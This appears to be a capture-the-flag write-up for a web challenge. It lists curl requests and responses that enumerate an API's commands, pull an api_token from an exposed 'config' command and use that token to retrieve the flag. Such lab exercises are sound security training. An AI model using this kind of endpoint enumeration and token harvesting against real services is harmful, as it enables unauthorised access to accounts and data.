Visit the site at and investigate the API that serves the page to find a way to get the flag.

To the developer console and the network tab, we find that it's making requests shaped like this:

curl -X POST "" -d '{"getUser": 1}'

Let's try not providing anything in that JSON object:

curl -X POST "" -d '{}'
{"statusCode": 200, "body": {"commands": ["getUser", "setUser", "getFlag", "config"]}}


curl -X POST "" -d '{"getFlag": {}}'
{"statusCode": 200, "body": {"error": "missing api_token."}}


What about that config endpoint?

curl -X POST "" -d '{"config": {}}'
{"statusCode": 200, "body": {"api_token": "supersecret31337apitoken"}}


curl -X POST "" -d '{"getFlag": {}, "api_token": "supersecret31337apitoken"}'
{"statusCode": 200, "body": {"flag": "LAx_AUThEntiCaTION-:("}}

(technically, this isn't lax authentication, it's sensitive data exposure)